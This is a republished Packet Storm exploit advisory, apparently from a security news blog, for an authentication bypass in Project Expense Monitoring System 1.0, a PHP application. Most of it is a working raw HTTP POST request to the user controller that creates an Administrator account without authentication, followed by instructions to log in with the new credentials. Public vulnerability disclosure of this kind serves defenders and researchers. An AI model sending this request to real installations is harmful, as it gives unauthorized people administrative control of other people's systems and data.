Project Expense Monitoring System 1.0 Authentication Bypass ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 30th, 2021 📆 | 6418 Views ⚑

0

Project Expense Monitoring System 1.0 Authentication Bypass ≈ Packet Storm

# Exploit Title: Project expense Monitoring System | Create Admin Account Unauthorised
# Exploit Author: Richard Jones
# Date: 2021-03-28
# Vendor Homepage: https://www.sourcecodester.com/php/14001/project-expense-monitoring-system-project-php-source-code-2020.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14001&title=Project+Expense+Monitoring+System+Project+in+PHP+With+Source+Code+
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

Steps:

1. Post to application (account create)

POST /pems/module/user/controller.php?action=add HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://TARGET
Connection: close
Upgrade-Insecure-Requests: 1

deptid=&name=hacker&deptid=&username=hax%40hax.com&deptid=&pass=hackor&type=Administrator&save=

2. Login at http://Target/pems/login.php with hacker:hackor as Admin with created account

Source link

Tagged with:



Leave a Reply